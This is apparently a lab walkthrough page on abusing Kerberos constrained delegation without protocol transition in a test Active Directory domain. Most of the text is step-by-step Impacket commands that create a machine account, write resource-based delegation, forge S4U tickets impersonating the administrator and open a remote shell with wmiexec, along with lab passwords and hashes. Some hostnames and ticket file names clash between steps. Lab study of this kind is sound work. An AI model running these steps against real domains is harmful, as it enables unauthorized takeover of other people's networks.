Without protocol transition

To look at this option, rdp with Fernando.Alonzo

xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80%  /cert-ignore

This result to this in the windows GUI :

A good example of exploitation can be found here: https://snovvcrash.rocks/2022/03/06/abusing-kcd-without-protocol-transition.html

The self-RBCD trick doesn’t work anymore. When i was writing this article i tried the self-rbcd without success many times. After multiple tries and fail i ask to charlie (@_nwodtuhs) what i am doing wrong, because i can’t find out why this don’t work as expected. He explained to me that the self rbcd trick didn’t work anymore and have been silent patch by Microsoft :’(

To exploit the constrained delegation here we only need a forwardable TGS as administrator to any service on castelblack
But if we do a s4u (s4u2self + s4u2proxy) like we did with protocol transition, the s4uself will send us a not forwardable TGS and the attack will fail.
So to exploit and get the forwardable TGS we need, we first need to add a computer and use RBCD between the created computer (rbcd_const$) and the computer who have delegation set (here castelblack$).
By doing that, you can do a s4u2self followed by a s4u2proxy on the added computer and the result is a forwardable tgs on hots/castelblack$ as administrator.
Once that done, you have the forwardable ticket to pass to s4u2proxy, and we even can change the request service with -altservice

# add computer X (rbcd_const)
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.newyork.local/pablo.sandoval:baseballpanda'

# add rbcd from X (rbcd_const) to constrained (Yonkers)
rbcd.py -delegate-from 'rbcd_const$' -delegate-to 'Yonkers$' -dc-ip 192.168.56.11 -action 'write' -hashes ':2634cbdd337c86aa0ecffd1dd457a2a8' north.newyork.local/'Yonkers$'

Do the s4u2self followed by the s4u2proxy on Yonkers (this is the classic RBCD attack)

# s4u2self on X (rbcd_const)
getST.py -self -impersonate "administrator" -dc-ip 192.168.56.11  north.newyork.local/'rbcd_const$':'rbcdpass'

# s4u2proxy from X (rbcd_const) to constrained (Yonkers)
getST.py -impersonate "administrator" -spn "host/Yonkers" -additional-ticket 'administrator@rbcd_const$@NORTH.newyork.LOCAL.ccache' -dc-ip 192.168.56.11  north.newyork.local/'rbcd_const$':'rbcdpass'

And launch the s4uProxy with the forwardable ticket

# s4u2proxy from constrained (yonkers) to target (bronx) - with altservice to change the SPN in use
getST.py -impersonate "administrator" -spn "http/bronx" -altservice "cifs/bronx" -additional-ticket 'Administrator@host_yonkers@NORTH.NEWYORK.LOCAL.ccache' -hashes :2634cbdd337c86aa0ecffd1dd457a2a8 -dc-ip 192.168.56.11 north.newyork.local/'yonkers$'

export KRB5CCNAME=/workspace/administrator@cifs_yonkers@NORTH.NEWYORK.LOCAL.ccache 
wmiexec.py -k -no-pass north.newyork.local/administrator@yonkers

After the exploit a little clean up of the lab, flush the rbcd entry and delete the computer account with a domain admin:

rbcd.py -delegate-to 'yonkers$' -delegate-from 'rbcd_const$' -dc-ip 192.168.56.11 -action 'flush' -hashes ':2634cbdd337c86aa0ecffd1dd457a2a8' north.newyork.local/'Yonkers$'
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1!' -delete

PreviousWith Protocol Transmition NextResource Based Constrained Delegation

Last updated 2 years ago